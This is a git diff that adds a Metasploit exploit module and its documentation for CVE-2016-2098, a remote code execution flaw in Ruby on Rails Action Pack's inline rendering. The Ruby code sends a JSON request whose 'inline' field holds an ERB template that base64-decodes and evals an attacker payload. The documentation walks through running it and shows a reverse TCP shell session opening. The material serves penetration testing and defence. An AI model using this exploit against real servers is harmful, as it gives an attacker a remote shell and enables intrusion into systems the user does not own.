diff --git a/documentation/modules/exploit/multi/http/rails_actionpack_inline_exec.md b/documentation/modules/exploit/multi/http/rails_actionpack_inline_exec.md new file mode 100644 index 0000000000..9a9c9b7f77 --- /dev/null +++ b/documentation/modules/exploit/multi/http/rails_actionpack_inline_exec.md @@ -0,0 +1,43 @@ +rails_actionpack_inine_exec is a module that exploits the render method in Action Pack. +Applications that pass unverified user input to the ```render``` method in a controller +or view may be vulnerable to code injection. + +## Vulnerable Application + +Action Pack versions prior to 3.2.22.2, 4.1.14.2, and 4.2.5.2 use unsafe dynamic rendering. + +## Verification Steps + +Assuming you have the right requirements to run a rails server, you can use the following fork +to set up the vulnerable server for testing: + +1. Do: ```git clone https://github.com/wchen-r7/dh-CVE_2016_2098.git``` +2. Do: ```bundle install``` +3. Do: ```rails -s -b 0.0.0.0``` +4. Start msfconsole +5. Do: ```use exploit/multi/http/rails_actionpack_inline_exec``` +6. Do: ```set RHOST [rails server IP]``` +7. Do: ```set RPORT 3000```. 3000 is the default port for the rails server. +8. Do: ```set targeturi /exploits``` +9. Configure the rest of the options (for the modules or the payload) +10. Do: ```exploit```, and you should get a session: + +``` +msf exploit(rails_actionpack_inline_exec) > run + +[*] Started reverse TCP handler on 192.168.146.1:4444 +[*] Sending inline code to parameter: id +[*] Command shell session 1 opened (192.168.146.1:4444 -> 192.168.146.161:56661) at 2016-07-07 15:56:00 -0500 +``` + +## Options + +To use this module, you must manually discover the correct values for these datastore options: + +**TARGETURI** + +The path to a vulnerable Ruby on Rails application. + +**TARGETPARAM** + +The target parameter to inject with inline code. diff --git a/modules/exploits/multi/http/rails_actionpack_inline_exec.rb b/modules/exploits/multi/http/rails_actionpack_inline_exec.rb new file mode 100644 index 0000000000..810ca9abef --- /dev/null +++ b/modules/exploits/multi/http/rails_actionpack_inline_exec.rb @@ -0,0 +1,70 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Ruby on Rails ActionPack Inline ERB Code Execution', + 'Description' => %q{ + This module exploits a remote code execution vulnerability in the + inline request processor of the Ruby on Rails ActionPack component. + This vulnerability allows an attacker to process ERB to the inline + JSON processor, which is then rendered, permitting full RCE within + the runtime, without logging an error condition. + }, + 'Author' => + [ + 'RageLtMan ' + ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'CVE', '2016-2098' ] + ], + 'Platform' => 'ruby', + 'Arch' => ARCH_RUBY, + 'Privileged' => false, + 'Targets' => [ ['Automatic', {} ] ], + 'DisclosureDate' => 'Mar 1 2016', + 'DefaultOptions' => { + "PrependFork" => true + }, + 'DefaultTarget' => 0)) + + register_options( + [ + Opt::RPORT(80), + OptString.new('TARGETURI', [ true, 'The path to a vulnerable Ruby on Rails application', "/"]), + OptString.new('TARGETPARAM', [ true, 'The target parameter to inject with inline code', 'id']) + ], self.class) + + end + + def json_request + code = Rex::Text.encode_base64(payload.encoded) + return { + datastore['TARGETPARAM'] => {"inline" => "<%= eval(%[#{code}].unpack(%[m0])[0]) %>"} + }.to_json + end + + def exploit + print_status("Sending inline code to parameter: #{datastore['TARGETPARAM']}") + send_request_cgi({ + 'uri' => normalize_uri(target_uri.path), + 'method' => 'GET', + 'ctype' => 'application/json', + 'headers' => { + 'Accept' => 'application/json' + }, + 'data' => json_request + }, 25) + end +end